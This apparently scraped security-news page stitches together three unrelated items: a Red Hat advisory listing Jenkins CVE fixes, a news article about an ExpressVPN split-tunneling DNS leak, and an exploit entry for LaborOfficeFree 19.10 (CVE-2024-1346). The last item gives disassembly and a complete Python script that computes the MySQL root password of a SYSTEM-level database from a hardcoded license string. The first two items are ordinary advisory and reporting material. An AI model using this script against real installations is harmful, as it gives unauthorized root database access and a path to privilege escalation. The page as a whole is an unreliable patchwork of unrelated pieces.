Red Hat Security Advisory 2024-0778-03 - An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, improper authorization, information leakage, insecure permissions, and open redirection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0778.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Jenkins and Jenkins-2-plugins security update  
Advisory ID:        RHSA-2024:0778-03  
Product:            OpenShift Developer Tools and Services  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0778  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2020-7692  
====================================================================

Summary: 

An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization (CVE-2020-7692)

* maven: Block repositories using http by default (CVE-2021-26291)

* snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)

* maven-shared-utils: Command injection via Commandline class (CVE-2022-29599)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)

* jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE (CVE-2024-23897)

* jenkins: cross-site WebSocket hijacking (CVE-2024-23898)

* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)

* guava: insecure temporary directory creation (CVE-2023-2976)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* spring-security: Empty SecurityContext Is Not Properly Saved Upon Logout (CVE-2023-20862)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* Jenkins: Open redirect vulnerability in OpenShift Login Plugin (CVE-2023-37947)

* jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* jenkins-plugins: cloudbees-folder: CSRF vulnerability in Folders Plugin (CVE-2023-40337)

* jenkins-plugins: cloudbees-folder: Information disclosure in Folders Plugin (CVE-2023-40338)

* jenkins-plugins: config-file-provider: Improper masking of credentials in Config File Provider Plugin (CVE-2023-40339)

* jenkins-plugins: blueocean: CSRF vulnerability in Blue Ocean Plugin allows capturing credentials (CVE-2023-40341)

* Jenkins: Temporary file parameter created with insecure permissions (CVE-2023-27903)

* Jenkins: Information disclosure through error stack traces related to agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-7692

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1856376  
https://bugzilla.redhat.com/show_bug.cgi?id=1955739  
https://bugzilla.redhat.com/show_bug.cgi?id=2066479  
https://bugzilla.redhat.com/show_bug.cgi?id=2107376  
https://bugzilla.redhat.com/show_bug.cgi?id=2126789  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2164278  
https://bugzilla.redhat.com/show_bug.cgi?id=2170039  
https://bugzilla.redhat.com/show_bug.cgi?id=2170041  
https://bugzilla.redhat.com/show_bug.cgi?id=2177632  
https://bugzilla.redhat.com/show_bug.cgi?id=2177634  
https://bugzilla.redhat.com/show_bug.cgi?id=2180530  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2222710  
https://bugzilla.redhat.com/show_bug.cgi?id=2227788  
https://bugzilla.redhat.com/show_bug.cgi?id=2232422  
https://bugzilla.redhat.com/show_bug.cgi?id=2232423  
https://bugzilla.redhat.com/show_bug.cgi?id=2232425  
https://bugzilla.redhat.com/show_bug.cgi?id=2232426  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2239634  
https://bugzilla.redhat.com/show_bug.cgi?id=2260180  
https://bugzilla.redhat.com/show_bug.cgi?id=2260182  
https://issues.redhat.com/browse/JKNS-271  
https://issues.redhat.com/browse/JKNS-289  
https://issues.redhat.com/browse/OCPBUGS-10976  
https://issues.redhat.com/browse/OCPBUGS-11158  
https://issues.redhat.com/browse/OCPBUGS-11348  
https://issues.redhat.com/browse/OCPBUGS-1357  
https://issues.redhat.com/browse/OCPBUGS-13652  
https://issues.redhat.com/browse/OCPBUGS-13901  
https://issues.redhat.com/browse/OCPBUGS-14113  
https://issues.redhat.com/browse/OCPBUGS-14393  
https://issues.redhat.com/browse/OCPBUGS-14642  
https://issues.redhat.com/browse/OCPBUGS-15648  
https://issues.redhat.com/browse/OCPBUGS-1709  
https://issues.redhat.com/browse/OCPBUGS-1942  
https://issues.redhat.com/browse/OCPBUGS-2099  
https://issues.redhat.com/browse/OCPBUGS-2184  
https://issues.redhat.com/browse/OCPBUGS-2318  
https://issues.redhat.com/browse/OCPBUGS-27391  
https://issues.redhat.com/browse/OCPBUGS-3692  
https://issues.redhat.com/browse/OCPBUGS-4819  
https://issues.redhat.com/browse/OCPBUGS-4833  
https://issues.redhat.com/browse/OCPBUGS-655  
https://issues.redhat.com/browse/OCPBUGS-6632  
https://issues.redhat.com/browse/OCPBUGS-6982  
https://issues.redhat.com/browse/OCPBUGS-7016  
https://issues.redhat.com/browse/OCPBUGS-7050  
https://issues.redhat.com/browse/OCPBUGS-710  
https://issues.redhat.com/browse/OCPBUGS-8420  
https://issues.redhat.com/browse/OCPBUGS-8497  
https://issues.redhat.com/browse/OCPTOOLS-246

Red Hat Security Advisory 2024-0778-03

By Waqas
Patch Your VPN! ExpressVPN Bug Leaks DNS Requests for Windows Users with Split Tunneling!
This is a post from HackRead.com Read the original post: ExpressVPN Bug Leaked DNS Requests for Windows Users

**Security researchers uncover a flaw in ExpressVPN’s Windows client, potentially exposing browsing activity for a small percentage of users.**

A recent discovery by security researchers revealed a worrying bug in **ExpressVPN**‘s Windows client, potentially leaking sensitive DNS requests outside the encrypted VPN tunnel.

This means that, under specific circumstances, websites visited by affected users could be visible to their internet service provider (ISP). While the actual content of online activity remains encrypted, the knowledge of visited websites can still be intrusive and compromise anonymity.

****Who Was Affected:****

The vulnerability only affected users who had the “split tunneling” feature enabled in their **ExpressVPN** client. This feature allows users to choose which applications bypass the VPN connection while others remain protected. The issue reportedly impacted roughly 1% of ExpressVPN’s Windows user base.

****Impact and Mitigation:****

While the leak did not expose the actual content of online activity, it could still reveal browsing habits and potentially be used for targeted advertising or tracking. Thankfully, ExpressVPN swiftly **addressed the issue** by releasing a patched version (12.73.0) in January 2024. Users with split tunneling enabled are strongly advised to update their clients immediately.

> _Versions 12.23.1–12.72.0 of our Windows app, published between May 19, 2022, and Feb. 7, 2024, had a bug that allowed some users’ DNS requests to go unprotected when split tunneling was activated. In these instances, the apps that were supposed to use the VPN might, under some circumstances, send DNS requests to third-party DNS servers instead of our servers._
> 
> ExpressVPN

****ExpressVPN’s Response:****

ExpressVPN acknowledged the bug and emphasized its commitment to user privacy. The company also **revealed** that the bug was discovered and reported by CNET’s Attila Tomaschek.

They released a detailed explanation of the issue and the fix implemented, along with instructions on how to update the client. They also clarified that the vast majority of their users were not affected.

****Lessons Learned:****

This incident highlights the importance of keeping software, particularly security software, up-to-date. It also reinforces the need for careful consideration when using features like split tunneling, as they can introduce potential vulnerabilities. Users should be aware of the trade-offs involved and prioritize their privacy needs when configuring their **VPN** settings.

**In Summary**

*   The bug was discovered and reported by CNET’s Attila Tomaschek.
*   This was not a full-blown data leak, only DNS requests leaked in specific situations.
*   The content of your online activity remained encrypted and protected.
*   The issue only affected certain versions of the ExpressVPN client on Windows.
*   The issue has been fixed and the vast majority of users were not affected.

1.  **How to Secure a Website by Monitoring DNS Records**
2.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
3.  **New VPN Malvertising Attack Drops OpcJacker Crypto Stealer**
4.  **Google Incognito Mode: New Disclaimer Reveals Data Tracking**
5.  **Free VPN Service SuperVPN Exposes 360 Million User Records**
6.  **Chinese VPN app Quickfox caught exposing 1 million users’ data**

ExpressVPN Bug Leaked DNS Requests for Windows Users

LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.

    # Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346# Google Dork: N/A# Date: 09/02/2023# Exploit Author: Peter Gabaldon - https://pgj11.com/# Vendor Homepage: https://www.laborofficefree.com/# Software Link: https://www.laborofficefree.com/#plans# Version: 19.10# Tested on: Windows 10# CVE : CVE-2024-1346# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable."""  After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).    Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.     Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.    00506548 | 53                       | push ebx                                | Aqui se hacen el XOR y demas que calcula la pwd :)    00506549 | 56                       | push esi                                |    0050654A | A3 7CFD8800              | mov dword ptr ds:[88FD7C],eax           | eax:"hola00331-20471-98465-AA370"    0050654F | 0FB7C2                   | movzx eax,dx                            | eax:"hola00331-20471-98465-AA370"    00506552 | 85C0                     | test eax,eax                            | eax:"hola00331-20471-98465-AA370"    00506554 | 7E 2E                    | jle laborofficefree.506584              |    00506556 | BA 01000000              | mov edx,1                               |    0050655B | 8B1D 7CFD8800            | mov ebx,dword ptr ds:[88FD7C]           |    00506561 | 0FB65C13 FF              | movzx ebx,byte ptr ds:[ebx+edx-1]       |    00506566 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506568 | 81E6 FF000000            | and esi,FF                              |    0050656E | 33DE                     | xor ebx,esi                             |    00506570 | 8B1C9D A40B8800          | mov ebx,dword ptr ds:[ebx*4+880BA4]     |    00506577 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506579 | C1EE 08                  | shr esi,8                               |    0050657C | 33DE                     | xor ebx,esi                             |    0050657E | 8919                     | mov dword ptr ds:[ecx],ebx              |    00506580 | 42                       | inc edx                                 |    00506581 | 48                       | dec eax                                 | eax:"hola00331-20471-98465-AA370"    00506582 | 75 D7                    | jne laborofficefree.50655B              |    00506584 | 5E                       | pop esi                                 |    00506585 | 5B                       | pop ebx                                 |    00506586 | C3                       | ret                                     |     The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.    005065C8 | F755 F8                  | not dword ptr ss:[ebp-8]                |  Running this script produces the root password of the LaborOfficeFree MySQL.    C:\Users\***\Desktop>python myLaborRootPwdCalculator.py    1591779762        C:\Users\***\Desktop>"""#! /usr/bin/python3from operator import xorimport ctypesif __name__ == "__main__":  magic_str = "hola00331-20471-98465-AA370"  mask = 0x000000ff  const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]  result = 0xffffffff  for c in magic_str:    aux = result & mask    aux2 = xor(ord(c), aux)    aux3 = xor(const[aux2], (result >> 8))    result = aux3  result = ~result  result = ctypes.c_long(result).value  print(result)

Tag

#google